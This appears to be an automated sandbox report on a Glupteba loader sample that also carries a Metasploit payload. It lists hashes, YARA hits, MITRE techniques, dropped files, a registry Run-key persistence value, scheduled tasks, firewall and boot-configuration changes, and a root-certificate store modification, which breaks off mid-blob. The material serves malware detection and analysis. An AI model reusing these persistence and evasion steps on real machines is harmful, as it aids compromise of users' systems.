glupteba | 39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435

General

Target

39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
Size

3.9MB
MD5

d2953d9b8f72ed45bf0b493c2fdc6b03
SHA1

4e5eded5b11877e20251aa2c4f63a7b001cb0142
SHA256

39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435
SHA512

ca1dc47ead2c3dfea0fd4d431ab87fb3f4a4d68522a55f1cae18a6440e6d301e1f7268bad9503c8f4ddfeb50b579c6fd7715f2d576d09c786339cc8c108534f0
SSDEEP

98304:mxeL4Gk8Vz7uUZ+Lg9Y2mdhWCPEw6QaEYQA:mwsGk8z7NZ+JPPsQaEYQA

Score

10^/10

glupteba metasploit backdoor discovery dropper evasion loader persistence trojan

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 7 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4836-136-0x0000000001470000-0x0000000001C74000-memory.dmp	family_glupteba
behavioral2/memory/4836-137-0x0000000000400000-0x0000000000C1E000-memory.dmp	family_glupteba
behavioral2/memory/4836-139-0x0000000000400000-0x0000000000C1E000-memory.dmp	family_glupteba
behavioral2/memory/5084-141-0x0000000000400000-0x0000000000C1E000-memory.dmp	family_glupteba
behavioral2/memory/5084-147-0x0000000000400000-0x0000000000C1E000-memory.dmp	family_glupteba
behavioral2/memory/1224-149-0x0000000000400000-0x0000000000C1E000-memory.dmp	family_glupteba
behavioral2/memory/1224-155-0x0000000000400000-0x0000000000C1E000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

Processes:

svchost.exe

description	pid	process	target process
PID 3440 created 4836	3440	svchost.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
PID 3440 created 1224	3440	svchost.exe	csrss.exe
PID 3440 created 1224	3440	svchost.exe	csrss.exe
PID 3440 created 1224	3440	svchost.exe	csrss.exe

Executes dropped EXE 2 IoCs

Processes:

csrss.exepatch.exe

pid process

1224 csrss.exe
1704 patch.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

4552 netsh.exe

pid	process
1224	csrss.exe
1704	patch.exe

pid	process
4552	netsh.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OldWood = "\"C:\\Windows\\rss\\csrss.exe\""	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Modifies boot configuration data using bcdedit 1 IoCs

Processes:

bcdedit.exe

pid process

3376 bcdedit.exe

pid	process
3376	bcdedit.exe

Drops file in System32 directory 6 IoCs

Processes:

csrss.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	csrss.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A	csrss.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	csrss.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A	csrss.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	csrss.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	csrss.exe

Drops file in Windows directory 2 IoCs

Processes:

39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe

description	ioc	process
File opened for modification	C:\Windows\rss	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
File created	C:\Windows\rss\csrss.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe

Program crash 64 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3348	4836	WerFault.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
2788	4836	WerFault.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
2976	4836	WerFault.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
4512	4836	WerFault.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
3136	4836	WerFault.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
1220	4836	WerFault.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
2912	4836	WerFault.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
3752	4836	WerFault.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
2292	4836	WerFault.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
3716	4836	WerFault.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
216	4836	WerFault.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
3688	4836	WerFault.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
4032	4836	WerFault.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
4300	4836	WerFault.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
4244	4836	WerFault.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
1812	4836	WerFault.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
3196	4836	WerFault.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
1456	4836	WerFault.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
2836	4836	WerFault.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
5068	4836	WerFault.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
4108	5084	WerFault.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
804	5084	WerFault.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
4756	5084	WerFault.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
2772	5084	WerFault.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
3444	5084	WerFault.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
2476	5084	WerFault.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
3292	5084	WerFault.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
3416	5084	WerFault.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
4828	5084	WerFault.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
2868	5084	WerFault.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
1692	5084	WerFault.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
928	5084	WerFault.exe	39245534561e70d5e4fa10d71c631965a24e6bb6da96fcfb9db6461f065da435.exe
2276	1224	WerFault.exe	csrss.exe
2220	1224	WerFault.exe	csrss.exe
2332	1224	WerFault.exe	csrss.exe
2548	1224	WerFault.exe	csrss.exe
4792	1224	WerFault.exe	csrss.exe
4580	1224	WerFault.exe	csrss.exe
4392	1224	WerFault.exe	csrss.exe
3448	1224	WerFault.exe	csrss.exe
4908	1224	WerFault.exe	csrss.exe
2804	1224	WerFault.exe	csrss.exe
3252	1224	WerFault.exe	csrss.exe
4784	1224	WerFault.exe	csrss.exe
1416	1224	WerFault.exe	csrss.exe
1608	1224	WerFault.exe	csrss.exe
3752	1224	WerFault.exe	csrss.exe
204	1224	WerFault.exe	csrss.exe
4812	1224	WerFault.exe	csrss.exe
1788	1224	WerFault.exe	csrss.exe
3080	1224	WerFault.exe	csrss.exe
1272	1224	WerFault.exe	csrss.exe
3732	1224	WerFault.exe	csrss.exe
3380	1224	WerFault.exe	csrss.exe
4160	1224	WerFault.exe	csrss.exe
2044	1224	WerFault.exe	csrss.exe
2024	1224	WerFault.exe	csrss.exe
4432	1224	WerFault.exe	csrss.exe
4552	1224	WerFault.exe	csrss.exe
1488	1224	WerFault.exe	csrss.exe
5092	1224	WerFault.exe	csrss.exe
3624	1224	WerFault.exe	csrss.exe
2648	1224	WerFault.exe	csrss.exe
2536	1224	WerFault.exe	csrss.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1472 schtasks.exe
4976 schtasks.exe

pid	process
1472	schtasks.exe
4976	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

csrss.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2592 = "Tocantins Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time"	csrss.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

csrss.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb